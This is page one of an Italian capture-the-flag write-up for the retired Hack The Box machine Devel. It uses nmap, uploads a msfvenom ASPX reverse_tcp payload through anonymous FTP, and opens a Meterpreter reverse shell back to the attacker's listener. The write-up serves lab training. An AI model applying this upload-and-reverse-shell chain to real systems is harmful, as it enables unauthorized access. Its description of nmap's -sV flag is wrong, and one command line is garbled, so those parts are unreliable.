HTB – Devel {retired}

l4sh3r@gmail.com

Con nmap effettuiamo una scansione delle porte e dei servizi aperti; la sintassi è sudo nmap -sV -sT -O -A -p- <INDIRIZZO IP> dove:
-sV indicano un SCTP INIT scan,
-sT indicano un TCP connect scan,
-O indica il riconoscimento del Sistema Operativo,
-A indica una scansione “invasiva”,
-p- indica la scansione di tutte le porte.

La scansione con nmap rivela aperte le seguenti porte:
21 – ftp,
80 – http.

kali@kali:~$ sudo nmap -sV -sT -O -A -p- 10.10.10.5
[sudo] password di kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:36 CEST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
| 06-14-20  12:21AM                 2824 met.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

Accediamo all’ftp con utente anonimo per verificarne il contenuto scoprendo che l’ftp è utilizzato per gestire i contenuti del sito; proviamo ad uplodare un file, con successo.

kali@kali:~$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> passive
Passive mode on.
ftp> put /home/kali/Documenti/HTB/Devel/File File
local: /home/kali/Documenti/HTB/Devel/File remote: File
227 Entering Passive Mode (10,10,10,5,192,13).
150 Opening ASCII mode data connection.
226 Transfer complete.
ftp>

Generiamo un payload di reverse_tcp con msfvenom utilizzando la sintassi msfvenom -p <NOME PAYLOAD> LHOST=<INDIRIZZO IP KALI> LPORT=<NUMERO PORTA> -f <TIPO FILE> -o <NOME FILE DI OUTPUT>.

kali@kali:~$ ste
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2802 bytes
Saved as: reverse.aspx

Tramite ftp carichiamo il payload sulla macchina target.

tp> passive
Passive mode on.
ftp> put reverse.aspx
local: reverse.aspx remote: reverse.aspx
227 Entering Passive Mode (10,10,10,5,192,16).
150 Opening ASCII mode data connection.
226 Transfer complete.
2857 bytes sent in 0.00 secs (20.7988 MB/s)

Usiamo meterpreter per aprire una shell in ascolto sulla porta 4444 utilizzando lo stesso payload creato precedentemente secondo la sintassi use eploit/multi/handler seguito da set payload <PATH DEL PAYLOAD>. Diamo run per eseguire.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:4444

Eseguiamo il payload dal browser web ed otteniamo una shell.

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.5:49173) at 2020-06-11 11:57:59 +0200

meterpreter >
Pages: 1 2 3

Leave a Reply

Your email address will not be published. Required fields are marked *